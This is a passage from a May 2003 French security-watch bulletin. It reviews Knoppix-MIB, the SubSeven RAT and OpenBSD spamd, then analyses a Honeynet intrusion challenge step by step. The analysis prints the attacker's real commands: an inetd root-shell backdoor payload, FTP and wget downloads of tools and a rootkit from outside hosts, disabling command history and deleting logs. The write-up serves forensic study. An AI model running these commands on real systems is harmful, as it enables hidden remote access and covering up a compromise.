INTEL x86, d’un espace disque libre sur un volume FAT ou FAT32 pour le stockage des données de l’utilisateur et
surtout d’un très bon lecteur de CD-Rom. Les tests effectués sur cette distribution ont démontré sa qualité et sa
capacité à gérer différents environnements matériels (poste fixe, portable, …). On regrettera cependant qu’une version
obsolète de Nessus (Nessus 1.2.7) soit livrée en appréciant par ailleurs la présence d’AirSnort, un analyseur dédié
réseaux ‘Wifi’.
Nous recommandons la lecture de l’excellente documentation d’installation intitulée ‘README-MIB’ préalablement à
toute utilisation du paquetage et en particulier la procédure permettant de créer un répertoire personnel qui sera
automatiquement reconnu lors du démarrage de ‘Knoppix’. L’utilisateur pressé pourra cependant démarrer ‘Knoppix’
puis lire le fichier ‘Comment créer son répertoire personnel’ directement accessible depuis le bureau. Attention
toutefois, un bogue conduit à ne plus pouvoir accéder à son répertoire si l’on a choisi de ne pas chiffrer celui-ci lors de
sa création.
Avec cette adaptation, Michel Bouissou - membre fondateur de la FIL, programmeur Linux et administrateur réseau
- nous offre enfin une version exploitable par tout un chacun et sécurisée de l’extraordinaire distribution ‘Knoppix’.
# Complément d'information
http://www.vie-privee.org/comm173
http://www.knopper.net/knoppix/
http://www.knoppixfr.org/
ftp://ftp.vie-privee.org/lafil/README-MiB
SUBSEVEN LEGENDS "
# Description
En février dernier une nouvelle version du célèbre outil de prise contrôle ‘SubSeven’ a été mise à
disposition à l’occasion du quatrième anniversaire de la diffusion de la toute première distribution. Après
avoir proposé en Janvier 2000 une édition spéciale dénommée ‘SubSeven Gold Edition’ (Rapport N°18
– Janvier 2000), ‘mobman’ réitère son approche ‘marketing’ en nous offrant une édition anniversaire
nommée ‘SubSeven Legends’.
Parmi tous les outils libres de type ‘RAT’ – Remote Access Tool - utilisés en environnement Windows dont les célèbres
BO (BackOrifice) et Socket23, ‘SubSeven’ reste encore à ce jour l’outil offrant la plus grande palette de fonctions.
On constatera l’absence de toute grande nouvelle fonctionnalité dans cette édition déjà annoncée en Février 2002 et
qui devra être considérée comme une simple mise à jour des versions 2.1.x. Ecrit en langage Delphi et désormais
parfaitement fonctionnelle dans les environnements ‘Windows2000’ et ‘Windows XP’, ‘SubSeven Legends’ offre
cependant la possibilité de modifier l’apparence du client par le biais d’un habillement (ou ‘skins’) totalement
configurable par l’utilisateur.
Nous devons avouer être quelque peu perplexe face au nombre de versions actuellement diffusées de cet outil, et plus
particulièrement, par l’absence totale d’informations concernant la stratégie utilisée pour numéroter les différentes
versions. Ainsi, la version 2.2 est disponible depuis mars 2001 (Rapport N°32 – Mars 2001). Doit-on en conclure que
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 45/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
l’auteur maintient deux branches de développement (V2.1.x et V2.2.x) en parallèle ?
Rappelons que cet outil est régulièrement utilisé à des fins illicites par des pirates désireux de conserver le contrôle
d’un système Windows compromis. L’existence d’une version fonctionnelle dans tous les environnements Windows va
certainement conduire à une recrudescence de l’utilisation de SubSeven dont la partie ‘serveur’ est toujours détectée
par la majorité des anti-virus.
Le lecteur se connectant sur le site ‘officiel’ de téléchargement sera accueilli par l’avertissement suivant probablement
destiné à éviter la fermeture du site au titre d’une quelconque loi sur la diffusion d’outils d’attaques.
This site uses 'hacker jargon' and role-playing scenarios when describing its activities and the use of the content
provided here in for effect and psychological reference. Any discussion of activities which could be considered
illegal by either Federal or State laws are purely fictional and should be regarded as such by all. Under no
circumstances should any of the role-playing scenarios or descriptions, detailed in conjunction with the content of
this site, be enacted on an unwitting or unauthorized computer or individual.
Le lecteur désireux d’en savoir plus sur les fonctionnalités offertes par la version précédente – Version 2.2 - pourra se
reporter à l’excellente analyse publiée en Mars 2001 par le SANS sous le titre ‘SubSeven 2.2: New Flavor of an Old
Favorite’.
# Complément d'information
http://www.subseven.ws/
http://www.sans.org/rr/toppapers/subseven_22.php
SPAMD
# Description
‘spamd’ est un outil permettant, comme son nom le suggère, de gérer les problèmes de SPAM. Le SPAM est un
terme utilisé pour qualifier l’envoie non sollicité de mails ou pouriels. C’est un phénomène de plus en plus courant.
Le but de cette pratique est de saturer les ressources d’internet, par l’émission quasi constante de trafic inutile. Pour
lutter contre ce phénomène, plusieurs techniques sont envisageables, et ont été implémentées au cours du temps.
Notre article présentera ‘spamd’, la solution du projet OpenBSD, disponible depuis la version 3.3 de leur système
d’exploitation.
Fonctionnement
‘spamd’ est en réalité un faux démon smtp, qui rejette le mail non légitime. Il est en écoute sur un socket local
(en écoute sur l’interface de loopback) et dans l’attente de connexions. Il interagit directement avec le filtre de
paquets ‘pf’, qui redirige de manière transparente vers ‘spamd’ tout trafic initié depuis une adresse contenue dans
la table ‘spamd’.
Dans ‘pf’, le concept de table permet de regrouper des règles concernant un ensemble d’adresses. Dans le cas de
‘spamd’, il permet de figer les règles par rapport à une base d’adresse qui est, elle, dynamique. Ainsi, les seules
modifications à apporter seront des modifications sur la table: ajout d’une adresse, suppression d’une adresse, etc…
Lorsqu’un polluposteur - une #telnet x.y.org 25
traduction de ‘spammer’ - est Trying A.B.C.D...
redirigé sur ‘spamd’, celui ci se Connected to A.B.C.D.
comporte comme un démon Escape character is '^]'.
SMTP classique, sauf qu’il répond 220 x.y.org ESMTP spamd IP-based SPAM blocker; Thu May 22 17:00
helo notme
très lentement aux requêtes du
250 Hello, spam sender. Pleased to be wasting your time.
polluer, et qu’il ne délivrera pas Mail from: [email protected]
le mail. En fait, le message 250 You are about to try to deliver spam.
d’erreur conduira le service de
Your time will be spent, for nothing.
messagerie du polluposteur à rctp to: [email protected]
maintenir le message en attente 450-SPAM. Your address a.b.c.d is in the spews level 1 database
et à tenter de régulièrement 450 See http://www.spews.org/ask.cgi?x=a.b.c.d for more details
Connection closed by foreign host.
retransmettre celui-ci.
Le lecteur l’aura compris, l’objectif est ici de monopoliser les ressources du service de ‘pollupostage’ afin de ralentir
son action voire de générer un surcoût suffisamment conséquent pour décourager le polluposteur.
Mise à jour de la base d’adresses
L’alimentation de la table ‘spamd’ peut se faire de plusieurs manières :
• En utilisant des listes directement renseignées par les administrateurs,
• En ajoutant à la table des entrées, en ligne de commande: ‘pfctl –t spamd –T add 1.2.3.0/24’ par exemple,
• Via l’ordonnanceur en utilisant ‘spamd-setup’ qui se chargera de la mise à jour.
L’utilisation de la dernière méthode est fortement recommandée. En effet, ‘spamd-setup’ est capable d’aller
charger des listes d’adresses mises à jour en temps réel sur les sources définies dans un fichier de configuration
dont un exemple est proposé ci-dessous:
spews1:\
:black:\
:msg="SPAM. Your address %A is in the spews level 1 database\n\
See http://www.spews.org/ask.cgi?x=%A for more details":\
:method=http:\
:file=www.spews.org/spews_list_level1.txt:
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 46/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
A ce propos, nos tests ont mis en évidence que deux des listes référencées – spews1, spews2 - ne sont
actuellement pas accessibles. En tentant d’accéder http://www.spews.org/spews_list_level1.txt nous tombons sur
une page blanche.
Il reste malgré tout les deux listes à télécharger sur www.okean.com, qui permettent d’avoir une base de plus de
9000 adresses de polluposteurs dans la table spamd, en utilisant la configuration par défaut.
L’exemple ci-dessous présente une règle permettant de charger une base d’adresses définie en local dans le fichier
‘myblack.txt’:
myblack:\
:black:\
:msg=/var/mail/myblackmsg.txt:\
:method=file:\
:file=/var/mail/myblack.txt
L’utilisation de l’adresse IP source comme moyen de discrimination pose le problème suivant:
qu’adviendra-t-il des mails envoyés par des clients/partenaires/amis qui auraient été malencontreusement
ajoutés aux listes diverses qu’utilise ‘spamd’ pour définir les adresses à rejeter ?
La solution proposée par ‘spamd’ consiste à établir une liste blanche contenant donc les adresses des machines qui
seront systématiquement autorisées à déposer du courrier.
mywhite:\
:white:\
:method=file:\
:file=/var/mail/mywhite.txt
On remarque que ‘spamd-setup’ s’appuie sur des bases existantes comme spews.org, ou encore okean.org,
ceci afin d’éviter de dupliquer l’effort de maintien des bases d’adresses référençant les polluposteurs.
Solutions alternatives
Plutôt que de filtrer au niveau paquet, il est possible d’intégrer au sein du serveur SMTP une vérification de chaque
mail portant sur les champs de l’entête ou sur le corps du message et de détecter une empreinte caractéristique
d’un ‘pollupostage’.
Cette méthode est implémentée par des logiciels comme SpamAssassin qui permet de qualifier la nature de
chaque mail, et ainsi de les filtrer soit au niveau MTA, soit au niveau MUA. Rappelons que le MTA (Mail Transport
Agent) est le terme générique pour qualifier un serveur SMTP, et que le terme MUA (Mail User Agent ) désigne les
logiciels clients de messagerie, comme Outlook, Mutt, etc…
L’inconvénient de cette approche réside dans le fait que le message étant acheminé la consommation des
ressources réseau est effective. Il incombera à l’utilisateur final de filtrer les messages marqués comme du
pollupostage.
Un exemple de mail qualifié par SpamAssassin comme étant du pollupostage est proposé ci-dessous :
From: "David Stone" <[email protected]>
To:
[email protected]
Subject: *****SPAM***** CONFIDENTIAL AND URGENT
Date:
Thu, 22 May 2003 16:32:35 +0200
------------------------ IMPORTANT NOTICE ---------------------------mail.YYYYY.org has identified this message as being probably spam.
The original message has been altered so you can recognise or block
similar unwanted mail in the future. You can do this by adding a filter
on the subject in your mail client software.
If you have a question, please ask [email protected].
Content analysis details:
(19.30 hits, 5 required)
FROM_ENDS_IN_NUMS
(0.7 points) From:
ends in numbers
REPLY_TO_HAS_UNDERLINE_NUMS (0.5 points) Reply-To: contains an underline and numbers/letters
RATWARE_OE_MALFORMED
(2.9 points) X-Mailer contains malformed Outlook Express version
US_DOLLARS
(1.4 points) BODY:
Nigerian scam key phrase (million dollars)
RAZOR2_CHECK
(2.0 points) Listed in Razor2, see http://razor.sf.net/
SUBJ_ALL_CAPS
(1.1 points) Subject is all capitals
FORGED_YAHOO_RCVD
(2.3 points) 'From' yahoo.com does not match 'Received' headers
RCVD_IN_OSIRUSOFT_COM
(0.6 points) RBL: Received via a relay in relays.osirusoft.com
[RBL check: found 135.102.179.80.relays.osirusoft.com., type: 127.0.0.6]
X_OSIRU_SPAMWARE_SITE
(1.1 points) RBL:
DNSBL: sender is a Spamware site or vendor
RCVD_IN_SBL
(0.6 points) RBL:
Received via SBLed relay,
see http://www.spamhaus.org/sbl/
[RBL check: found 135.102.179.80.sbl.spamhaus.org.]
FORGED_MUA_OUTLOOK
(3.3 points) Forged mail pretending to be from MS Outlook
NIGERIAN_BODY
(2.8 points) Message body has multiple indications of Nigerian spam
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 47/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
---------------------------------------------------------------------From: "David Stone" <[email protected]>
To: [email protected]
Reply-To: [email protected]
Subject: CONFIDENTIAL AND URGENT
Date: Thu, 22 May 2003 16:32:35 +0200
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
FROM- Prince David Stone
[email protected]
NUMBER:+228-902-88-44
DATE-22-5-2003
Les problèmes liés à l’envoi de mails non sollicité étant de plus en plus fréquents, il devient nécessaire de protéger son
système d’information contre toute tentative d’inondation par courrier électronique, mais également d’empêcher que
ses propres systèmes ne soient utilisés par des polluposteurs.
L’utilisation de techniques telles que celles employées par ‘spamd’ engendre plusieurs contraintes :
• La récupération des listes d’adresses utilise les services ‘FTP’ ou ‘HTTP’. Ces protocoles ne permettent pas de
garantir l’authenticité de la source et de la destination des connections, aussi il est envisageable de dérouter la
connexion, soit au niveau DNS, soit au niveau MAC, afin de fournir des listes d’adresses non valides, entraînant
un déni de service sur la messagerie,
• Le travail étant effectué au niveau paquet, il est nécessaire d’avoir des bonnes connaissances en terme de
routage et filtrage de flux IP,
• Enfin, dans le cas de ‘spamd’, l’environnement OpenBSD 3.3 (et son filtre de paquet ‘pf’) devra impérativement
être employé.
Pour conclure, ‘spamd’ reste une solution efficace pour lutter contre le ‘pollupostage’ étant donné qu’elle protège les
serveurs SMTP du périmètre considéré, mais également qu’elle permet de ralentir l’action des polluposteurs en
intervenant sur un facteur critique: le facteur économique.
# Complément d'information
http://www.openbsd.org
http://www.spamassassin.org
http://www.spews.org
http://www.okean.org
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Le site officiel du projet OpenBSD
Le site du projet SpamAssassin
Internet Spam Prevention Early Warning
Liste de Netblocks coréen et chinois utilises par des spammers
Page 48/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
TECHNIQUES
IRC IPV6 - SCAN OF THE MONTH
# Description
Proposé par les membres du projet ‘HoneyNet’ de AT&T Mexico, le défi du mois de mai consiste à analyser
l’utilisation assez particulière d’un système compromis à partir des éléments collectés par une sonde ‘snort’. Pour cela,
l’analyste aura en sa disposition les données collectées le jour de l’intrusion et celles correspondant au troisième jour
après la compromission.
L’analyste devra répondre aux questions suivantes :
1.
2.
3.
4.
5.
6.
7.
8.
9.
Quel est le système d’exploitation utilisé par le pot de miel, comment pouvez-vous le déterminer ?
Comment l’attaquant a t-il opéré pour rentrer dans le système ?
Quels ont été les systèmes utilisés durant l’attaque et comment ?
Pouvez-vous mettre en évidence les différentes séquences de l’attaque par un diagramme ?
Quel est le rôle des paquets ICMP contenant la chaîne ‘skillz’ ?
Pouvez-vous identifier le protocole non IP activé par l’attaquant et déterminer son utilisation ?
Pouvez-vous identifier la nationalité de l’attaquant ?
Quelle est l’implication de l’utilisation d’un protocole non IP sur les technologies IDS ?
Quel outil existant peut être employé pour décoder ce protocole?
Préparation de l’environnement
La première étape consiste à préparer l’environnement d’analyse sur nos systèmes LINUX et Windows. Aujourd’hui
nous n’utiliserons que l’outil ‘Ethereal’.
Validation des fichiers livrés
Les données collectées sont livrées sous la forme de deux fichiers d’archive – ‘day1.log.gz’ (2.75Mo) et
‘day3.log.gz’ (3.31Mo) - dont il convient de vérifier l’intégrité. Un rapide contrôle de la somme cryptographique
‘MD5’ des fichiers ‘.zip’ permet de s’assurer de l’intégrité de la distribution, ici:
C:> md5 day1.log.gz day3.log.gz
9875dbc9ac180366852d2a2be0ee016f
e5efade7f60209c1a45c4b0c445a1772
à comparer avec la somme donnée sur le site du défi :
day1.log.gz MD5 (day1.log.gz) = 9875dbc9ac180366852d2a2be0ee016f
day3.log.gz MD5 (day3.log.gz) = e5efade7f60209c1a45c4b0c445a1772
L’intégrité des archives téléchargées est confirmée – du moins en considérant que les sommes de contrôle
annoncées sur le site n’ont pas aussi été manipulées. La décompression des archives nous livre deux fichiers de
travail d’un volume de respectivement 6.7 Mo et 20 Mo.
Etude des données journalisées
L’étude statistique des données nous permettra d’identifier les protocoles utilisés et éventuellement certaines
anomalies.
Jour N°1
Le chargement du fichier ‘day1’ sous ‘Ethereal’ nous permet d’obtenir les informations suivantes sur le contexte:
• Quelques 18843 paquets ont été journalisés entre le 29 novembre 2002 à 7h26 et le 30 Novembre à 7h19.
• La fonction d’analyse statistique présente dans ‘Ethereal’ nous permet d’établir une liste des protocoles présentés
triés par activité:
Niveau
IP
Protocole/Service
ICMP
TCP
DATA
FTP control
FTP data
HTTP
DG Gryphon
IRC
UDP
DNS
NetBIOS
SysLog
Nb. Paquets
Soit en %
12773
4125
71
958
1293
420
418
3948
3940
5
3
67,79
21,89
0,38
5,08
6,86
2,23
0,10
20.95
20,91
0,03
0,02
Cette rapide étude met en évidence deux ‘anomalies’ qu’il sera nécessaire d’analyser: l’utilisation d’un ou plusieurs
protocoles TCP non identifiés (référencé(s) par le terme ‘DATA’) et d’un protocole identifié comme étant le
protocole ‘DG Gryphon’. Pour mémoire, sous ‘Ethereal’ la notion d’identification repose sur l’analyse du numéro de
port destination qui, s’il ne correspond à aucun service connu, sera référencé par le terme générique de ‘DATA’.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 49/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Le positionnement d’un filtre ‘ip.addr eq 192.168.100.28’ permet de confirmer que les évènements journalisés
dans ce fichier concernent tous le système compromis dont l’adresse ‘192.168.100.28’ nous est donnée dans la
présentation du défi.
Jour N°3
Le chargement du fichier ‘day3’ sous ‘Ethereal’ nous permet d’obtenir les informations suivantes sur le contexte:
• Quelques 123123 paquets ont été journalisés entre le 1 décembre 2002 à 7h20 et le 1 décembre 2002 à 7h19.
• La liste des protocoles utilisés est la suivante:
Niveau
IP
IPV6
Protocole/Service
ICMP
TCP
IRC
DATA
HTTP
UDP
DATA
DNS
SysLog
DIVERS Autres
ICMP
TCP
IRC
Nb. Paquets
7592
105973
955
3867
1619
2245
1573
63
13
9
3334
1765
Soit en %
6,17
86,07
0,78
3,14
1,31
1,82
1,28
0,05
0,02
0,00
2,71%
1,43
Un nouvel élément apparaît ici, rencontré pour la première fois dans le cadre des défis ‘honeynet’: l’utilisation du
protocole IP Version 6 que l’outil ‘ethereal’ gère fort heureusement parfaitement. On notera que ce protocole
semble principalement supporter une session TCP correspondant au service ‘IRC’.
Le positionnement d’un filtre ‘ip.addr eq 192.168.100.28’ permet de confirmer que les évènements journalisés
dans ce fichier concernent tous le système compromis dont l’adresse ‘192.168.100.28’ nous est donnée dans la
présentation du défi.
Levée de doute
La présence de certaines anomalies et de l’identification de l’utilisation du protocole IP V6 nous impose une phase de
levée de doute.
Jour N°1
Les deux anomalies constatées durant l’analyse du premier fichier de journalisation vont faire l’objet d’un contrôle
visant à valider l’analyse effectuée par ‘Ethereal’ notamment en ce qui concerne l’utilisation du protocole ‘DG
Gryphon’.
DG Gryphon
Le positionnement du filtre ‘gryphon’ permet de visualiser les 420 trames en cause et de mettre en évidence une
erreur d’interprétation de la part de l’outil ‘Ethereal’: de toute évidence le contenu de ces trames montre qu’il
s’agit d’une session IRC utilisant le port correspondant au protocole ‘Gryphon’. L’erreur est confirmée par la
présence de messages d’avertissement indiquant que la session ‘Gryphon’ n’a pu être reconstituée.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 50/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
L’utilisation de l’option permettant de forcer le décodage d’un protocole particulier nous permet de corriger l’erreur
d’identification en imposant le décodage ‘IRC’ sur le port TCP/7000 en source mais aussi en destination.
On retiendra de cette analyse qu’un service ‘IRC’ est actif sur le port TCP/7000 du système étudié.
DATA
Le positionnement d’un filtre composite éliminant tous les protocoles déjà référencés (‘not ftp and not ftp-data
and not http and not irc’) et ne conservant que les demandes de connexion (‘tcp and tcp.flags.ack eq 0 and
tcp.flags.syn eq 1’) permet de visualiser les trames n’ayant pu être identifiées.
Nous mettons ainsi en évidence des tentatives de connexion sur les services :
• TCP/1433
Ms-Sql-s
• TCP/1524
IngresLock
• TCP/6112
DtSpcd
• TCP/5555
Personnal Agent
Un rapide parcours des différentes séquences d’établissement met en évidence une incohérence concernant les
sessions établies vers le service TCP/5555 qui apparaissent correspondre ici encore à des sessions ‘IRC’.
On retiendra de cette analyse qu’un service ‘IRC’ est aussi actif sur le port TCP/5555 du système étudié et l’on
forcera ici aussi le décodage de ce service.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 51/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Jour N°3
Il s’agit maintenant de confirmer la réalité de l’utilisation du protocole IP V6 et d’analyser les échanges non identifiés
en conservant la configuration préalablement spécifiée: décodage du protocole ‘IRC’ sur les ports ‘TCP/5555’ et
‘TCP/7000’, ce qui sera le cas si l’on charge le nouveau fichier sans avoir quitté ‘Ethereal’.
IP V6
Le positionnement du filtre ‘ipv6’ permet de visualiser les 3348 trames annoncées transmises sur ce protocole.
Il apparaît que la majorité des trames correspondent à une session ‘IRC’ établie sur le port TCP/6667 du
système cible.
DATA
Le positionnement d’un filtre identique à celui utilisé pour l’analyse du fichier précédent permet de mettre en
évidence une succession de trames dont tout laisse à penser qu’il s’agit d’une campagne de sondage initiée depuis
le système cible.
Conclusion partielle
A ce stade de notre analyse, nous avons acquis la certitude qu’un serveur ‘IRC’ a été installé sur le système
compromis et activé sur des ports non standards: TCP/5555 et TCP/7000. Nous avons aussi détecté et
confirmé l’utilisation inhabituelle du protocole IP V6. Nous allons maintenant pouvoir aborder l’étude détaillée des
échanges.
Analyse des événements
Les événements identifiés à la suite du parcours chronologique des échanges par le biais de l’outil ‘ethereal’ vont être
présentés en nous concentrant sur les seuls éléments requis pour répondre aux questions du défi ou pertinents car
mettant en avant un procédé ou une technique intéressante.
Jour N°1
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 52/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Comme à notre habitude, nous référencerons ces évènements par le numéro du paquet associé.
Accès DNS
29 Novembre 2003 – 07h26
Les 560 premières trames correspondent majoritairement à des requêtes DNS émises par le système cible vers
presque autant de serveurs DNS externes.
Trame
1
2
559
560
Source
192.168.100.28
194.25.2.133
Service
UDP/53
Donnée
Requête ‘Query PTR 71.185.128.80.in-addr.arpa’
Réponse ‘p5080B947.dip.t-dialin.net’
192.168.100.28
194.25.2.133
UDP/53
Requête ‘Query A customermex-148-244-153-72.example.net.mx’
Réponse ‘no such name’
Le positionnement du filtre ‘dns’ met en évidence quelques 1970 requêtes ainsi qu’une période – Trames 561 à
2046 - durant laquelle aucune requête n’est émise. En l’état de l’analyse, nous considérerons que ces échanges
n’ont rien d’anormal.
Sondage NetBIOS
29 Novembre 2003 – 09h44
Une dizaine de requêtes à destination du serveur de nom NetBIOS (UDP/137) peuvent être constatées en début
et en fin de journalisation.
Trame
137
138
Source
10.12.9.141
192.168.100.28
Service
UDP/137
Donnée
Requête ‘NBSTAT’
Réponse ‘ICMP Destination unreachable’
18752
18753
218.14.182.224
192.168.100.28
UDP/137
Requête ‘NBSTAT’
Réponse ‘ICMP Destination unreachable’
Il s’agit ici probablement d’une activité classique de sondage. Toutes les requêtes reçoivent une réponse négative
sous la forme d’un paquet ICMP ‘Destination Unreachable’.
Sondage Ms-SQL-s
29 Novembre 2003 – 13h02
Quelques 18 tentatives de connexion au service ‘TCP/1433’ sont journalisées de la part de 6 systèmes, chacun
d’entre eux effectuant trois tentatives.
Trame
305
306
Source
24.167.44.129
192.168.100.28
Service
TCP/1433
Donnée
Paquet ‘SYN’
Paquet ‘RST/ACK’
17937
17938
64.231.37.135
192.168.100.28
TCP/1433
Paquet ‘SYN’
Paquet ‘RST/ACK’
Il s’agit manifestement d’une activité de sondage classique visant à déterminer la présence de ce service dans
l’optique d’exploiter un débordement de buffer. Il est fort vraisemblable que cela soit le fait de systèmes
compromis par le ver ‘SQL-Slammer’.
Exploitation vulnérabilité service ‘dtspcd’
29 Novembre 2003 – 16h36
Le système ‘61-219-90-180.HINET-IP.hinet.net’ (61.219.90.180) ouvre avec succès une session sur le service
CDE ‘DtSpcD’ dit ‘Common Desktop Environment Subprocess Control Service’. Cette session permet
d’identifier le système cible - un système ‘SunOs 5.8’ dénommé ‘zoberius’ – afin d’adapter l’attaque.
Trame
561
562
563
564
565
566
567
Source
61.219.90.180
192.168.100.28
61.219.90.180
61.219.90.180
192.168.100.28
Service
TCP/6112
61.219.90.180
192.168.100.28
TCP/6112
TCP/1524
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
Paquet ‘SYN’
Paquet ‘RST/ACK’
Paquet ‘SYN’
Paquet ‘SYN/ACK’
569
61.219.90.180
Paquet ‘PSH’ – Autorité ‘root’
571
61.219.90.180
Paquet ‘PSH’ – Système ‘zoberius’ – Type ‘SunOS 5.8 / Sun4u’
On notera qu’un sondage du service ‘ingreslock’ (TCP/1524) est effectué juste après l’ouverture de la session
mais sans succès.
Le système ‘61-219-90-180.HINET-IP.hinet.net’ exploite ensuite avec succès le débordement de buffer
existant dans ce service – Note VU#172583 du CERT - sur la connexion ouverte précédemment (Trame 566)
mais aussi sur une seconde connexion ouverte en parallèle.
Trame
576
577
Source
61.219.90.180
192.168.100.28
Service
TCP/6112
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
580
61.219.90.180
Paquet ‘ACK’ – ‘/bin/ksh sh –c echo ‘ingreslock stream tcp …’
587
192.168.100.28
Paquet ‘FIN/ACK’
La séquence shell ‘/bin/ksh sh –c echo ingreslock stream tcp nowait root /bin.sh sh –i >/tmp/x;
/usr/sbin/inetd –s /tmp/x; sleep 10; /bin/rm –f /tmp/x’ transmise dans la trame ‘580’ constitue un grand
classique déjà rencontré dans nos analyses précédentes. Elle permet l’activation d’un interpréteur de commande
interactif accessible sur le port ‘TCP/1524’. Ceci explique la séquence précédemment rencontrée visant à vérifier
que le système cible n’a pas déjà fait l’objet d’une compromission de ce type.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 53/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
L’attaquant vérifie d’ailleurs immédiatement que son attaque a bien fonctionné en tentant de nouveau une
connexion sur la porte dérobée.
Trame
588
589
590
Source
61.219.90.180
192.168.100.28
61.219.90.180
8351
Service
TCP/1524
61.219.90.180
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
Paquet ‘RST’
Cette session restera active de 16h36 à 17h00, période durant laquelle l’attaquant aura le loisir de passer une
succession de commandes. Son activité peut maintenant être suivie pas à pas en utilisant la fonction d’extraction
des flux TCP ‘Follow TCP Stream’ intégrée dans ‘Ethereal’.
Cette activité est détaillée ci-dessous, les commandes étant imprimées en rouge et les réponses en vert.
#uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:
/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export
PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk
'{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
#wget
wget: not found
#w
9:44am up 13 day(s), 4:24,0 users,load average: 0.00, 0.00, 0.01
User
tty
login@ idle
JCPU
PCPU what
#/bin/sh -i
#unset HISTFILE
#unset DISPLAY
#mkdir /usr/share/man/man1/.old
#cd /usr/share/man/man1/.old
#ftp 62.211.66.16 21
USER bobzz
PASS joka
get wget
get dlp
get solbnc
get iupv6sun
iupv6sun: No such file or directory.
get ipv6sun
quit
#ls
dlp
ipv6sun
solbnc
wget
#chmod +x solbnc wget dlp
#./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
#./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]
0K-> ......... ......... ......... ......... ......... [ 2%]
50K-> ......... ......... ......... ......... ......... [ 5%]
100K-> ......... ......... ......... ......... ......... [ 8%]
1750K-> ......... ......... ......... ......... ......... [ 97%]
1800K-> ......... ......... ......... .........
[100%]
09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]
#rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#cd sol
sol: does not exist
#./setup
./setup: not found
#cd sol
sol: does not exist
#tar -xf sol.tar.gz
#cd sol
#./setup
bobz oN ircNet on join #privè
_/
/\
\
Identification du système, recherche des
fichiers crées durant l’attaque, définition
d’un chemin d’accès par défaut et recherche
du n° de processus de la porte d’accès.
-> Système SunOS 5.8 sur Ultra5 ou 10
Appel de l’utilitaire ‘wget’
-> Inexistant
Identification des utilisateurs connectés
-> Personne
Ouverture d’un interpréteur dédié
Arrêt de la journalisation des commandes
Désactivation du display X11
Création d’un répertoire de travail masqué
Positionnement dans ce répertoire
Transfert ‘ftp’, ‘wget’ n’étant pas présent
-> Compte sur le système distant
-> mot de passe associé
Récupération de l’utilitaire ‘wget’
Récupération de l’utilitaire ‘dlp’
Récupération de l’utilitaire ‘solbnc’
Récupération du paquetage ‘iupv6sun’
-> paquetage inexistant
Correction de l’erreur de typographie
Fin de la session ftp
Vérification
-> Utilitaire à identifier
-> Pile IP V6 pour système SUNOS
-> proxy IRC
-> Transfert de fichier
Autorisation d’exécution des utilitaires
Transfert via ‘wget’
-> Il manque un paramètre !
Transfert du fichier ‘sol.tar.gz’
-> Transfert autorisé
Décompression de l’archive
-> Erreur, caractères ‘parasites’
Changement de répertoire
-> Erreur, inexistant
Lancement de l’installation
-> Erreur, inexistant
Changement de répertoire
-> Erreur, inexistant
Décompression de l’archive
Changement de répertoire
Lancement de l’installation
-> Connexion IRC ?
-> L’indispensable signature !
/\
___|
\
Autor: bobz
/
\/
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
|___
/
\_
\
/
\/
Page 54/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
********
********
**
******* **********
******* **
**
** **
**
******* **
**
******* **
**
**********
**
**
**
**
**
**
******
******
**
**
**
**
**
**
**
*
*
*
*
********
**********
**
**
**
**
**
**
/\
/\
_/
\
___| Autor: bobz
\
|___
/
/
\/
\_
\
/
\/
...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...
Ti:AmO:RosariA
Delete Logz...
Deleting /var/log...
/var/log/secure: No such file or directory
...
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
...
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
...
/var/log/cron.4: No such file or directory
